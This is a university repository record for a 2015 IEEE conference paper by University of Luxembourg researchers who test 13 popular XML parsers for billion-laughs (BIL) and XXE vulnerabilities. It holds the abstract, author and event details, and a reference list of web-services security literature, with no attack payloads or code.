XML Vulnerabilities (BIL, XXE); XML Parsers; Security Testing
Abstract :
[en] The Extensible Markup Language (XML) is extensively
used in software systems and services. Various XML-based
attacks, which may result in sensitive information leakage or
denial of services, have been discovered and published. However,
due to development time pressures and limited security expertise,
such attacks are often overlooked in practice. In this paper,
following a rigorous and extensive experimental process, we study
the presence of two types of XML-based attacks: BIL and XXE in
13 popular XML parsers. Furthermore, we investigate whether
open-source systems that adopt a vulnerable XML parser apply
any mitigation to prevent such attacks. Our objective is to provide
clear and solid scientific evidence about the extent of the threat
associated with such XML-based attacks and to discuss the
implications of the obtained results. Our conclusion is that most
of the studied parsers are vulnerable and so are systems that use
them. Such strong evidence can be used to raise awareness among
software developers and is a strong motivation for developers to
provide security measures to thwart BIL and XXE attacks before
deployment when adopting existing XML parsers.
Research center :
University of Luxembourg: SnT
Disciplines :
Computer science
Author, co-author :
Jan, Sadeeq ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT)
Nguyen, Duy Cu ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT)
Briand, Lionel ; University of Luxembourg > Interdisciplinary Centre for Security, Reliability and Trust (SNT) ; University of Luxembourg > Faculty of Science, Technology and Communication (FSTC) > Computer Science and Communications Research Unit (CSC)
External co-authors :
no
Language :
English
Title :
Known XML Vulnerabilities Are Still a Threat to Popular Parsers and Open Source Systems
Publication date :
03 August 2015
Event name :
The 2015 IEEE International Conference on Software Quality, Reliability & Security
Event organizer :
IEEE Reliability Society
Event place :
Vancouver, Canada
Event date :
03-08-2015 to 05-08-2015
Audience :
International
Main work title :
The 2015 IEEE International Conference on Software Quality, Reliability & Security, Vancouver 3-5 August 2015
Peer reviewed :
Peer reviewed
Name of the research project :
Automated Security Testing for XML Vulnerabilities
Imperva Web Application Attack Report. http://www.imperva.com/docs/HII Web Application Attack Report Ed4.pdf. Accessed: 2014-07-05.
W3C XML Standard. http://www.w3.org/TR/REC-xml/. Accessed: 2014-07-01.
XML External Entity Injection. http://securityhorror.blogspot.com/2012/03/what-is-xxe-attacks.html. Accessed: 2014-06-27.
XML Terminology. http://en.wikipedia.org/wiki/XML/. Accessed: 2014-02-20.
XML Vulnerabilities Introduction. http://resources.infosecinstitute.com/xml-vulnerabilities/. Accessed: 2014-06-22.
N. Antunes and M. Vieira. Comparing the effectiveness of penetration testing and static code analysis on the detection of sql injection vulnerabilities in web services. In Dependable Computing, 2009. PRDC '09. 15th IEEE Pacific Rim International Symposium on, pages 301-306, Nov 2009.
E. Bertino, L. Martino, F. Paci, and A. Squicciarini. Security for Web Services and Service Oriented Architectures. Springer, 2010.
M. R. Brenner and M. R. Unmehopa. Service-oriented architecture and web services penetration in next-generation networks. Bell Labs Technical Journal, 12 (2):147-159, 2007.
R. Chang, G. Jiang, F. Ivancic, S. Sankaranarayanan, and V. Shmatikov. Inputs of coma: Static detection of denial-of-service vulnerabilities. In Computer Security Foundations Symposium, 2009. CSF '09. 22nd IEEE, pages 186-199, July 2009.
J. Chen, Q. Li, C. Mao, D. Towey, Y. Zhan, and H.Wang. A web services vulnerability testing approach based on combinatorial mutation and soap message mutation. Service Oriented Computing and Applications, 8:1-13, 2014.
W. Chunlei, L. Li, and L. Qiang. Automatic fuzz testing of web service vulnerability. In Information and Communications Technologies (ICT 2014), 2014 International Conference on, pages 1-6, May 2014.
Y. Demchenko, L. Gommans, C. de Laat, and B. Oudenaarde. Web services and grid security vulnerabilities and threats analysis and model. In The 6th IEEE/ACM International Workshop on Grid Computing. IEEE, 2005.
A. Falkenberg, C. Mainka, J. Somorovsky, and J. Schwenk. A new approach towards dos penetration testing on web services. In Web Services (ICWS), 2013 IEEE 20th International Conference on, pages 491-498, June 2013.
A. N. Gupta and D. P. S. Thilagam. Attacks on web services need to secure xml on web. Computer Science and Engineering, An International Journal (CSEIJ), 3 (5), 2013.
M. Jensen, N. Gruschka, and R. Herkenhner. A survey of attacks on web services. Computer Science-Research and Development, 24 (4):185-197, 2009.
C. Mainka, J. Somorovsky, and J. Schwenk. Penetration testing tool for web services security. In Services (SERVICES), 2012 IEEE Eighth World Congress on, pages 163-170, June 2012.
R. Oliveira, N. Laranjeiro, and M. Vieira. Wsfaggressor: An extensible web service framework attacking tool. In Proceedings of the Industrial Track of the 13th ACM/IFIP/USENIX International Middleware Conference, MIDDLEWARE '12, pages 2:1-2:6. ACM, 2012.
S. Orrin. The soa/xml threat model and new xml/so/web 2.0 attacks and threats. In DEFCON 15, 2007.
S. Padmanabhuni, V. Singh, K. Senthil Kumar, and A. Chatterjee. Preventing service oriented denial of service (presodos): A proposed approach. In Web Services, 2006. ICWS '06. International Conference on, pages 577-584, Sept 2006.
V. Patel, R. Mohandas, and A. R. Pais. Attacks on web services and mitigation schemes. In Security and Cryptography (SECRYPT), Proceedings of the 2010 International Conference on, pages 1-6, July 2010.
S. Suriadi, A. Clark, and D. Schmidt. Validating denial of service vulnerabilities in web services. In Network and System Security (NSS), 2010 4th International Conference on, pages 175-182, Sept 2010.
S. Tiwari and P. Singh. Survey of potential attacks on web services and web service compositions. In Electronics Computer Technology (ICECT), 2011 3rd International Conference on, volume 2, pages 47-51, April 2011.
S. Varrette, P. Bouvry, H. Cartiaux, and F. Georgatos. Management of an academic hpc cluster: The ul experience. In Proc. of the 2014 Intl. Conf. on High Performance Computing & Simulation (HPCS 2014), Bologna, Italy, July 2014. IEEE.
X. Ye. Countering ddos and xdos attacks against web services. In Embedded and Ubiquitous Computing, 2008. EUC '08. IEEE/IFIP International Conference on, volume 1, pages 346-352, Dec 2008.